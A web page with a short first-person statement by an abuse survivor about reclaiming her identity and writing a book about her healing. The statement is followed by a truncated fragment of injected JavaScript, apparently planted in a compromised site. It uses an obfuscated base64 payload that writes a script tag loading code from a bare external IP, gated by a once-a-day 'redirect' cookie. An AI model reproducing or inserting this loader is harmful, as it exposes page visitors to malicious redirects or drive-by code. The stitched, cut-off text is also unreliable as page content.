038 – Kimberly S. (United States)

I was born Kimberly A. T. I was born pure and innocent and filled with the same wonder and potential of all children, if not struggling with illness or disease. However, when I was younger than I can remember, my groomers began the insidious process of grooming me to be a victim of their cruel desires. The mental, emotional, physical, sexual, psychological, and spiritual abuse that followed took me far from who I was born to be and into a world of despair. I became who I needed to be in order to transcend the abusive experiences and, eventually, worked to salvage the real me; the Kimberly I was born to be. The writing of The Doghouse Angel: From the Darkness of Abuse to the Light of Healing, was my final step in the journey to wholeness. I’m proud of the work I’ve done to heal and reclaim my identity and I’m proud to be a survivor. But I’m even more proud to be a thriver. Anyone who has worked to surmount the challenges of being a victim knows how difficult the journey can be. Yet, beyond all that pain is the recognition of who we truly are and, no matter how difficult the steps to rediscovering the true self, thriving beyond our survivorship to the promise of who we were meant to be, is worth the pain of the process. ..match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘
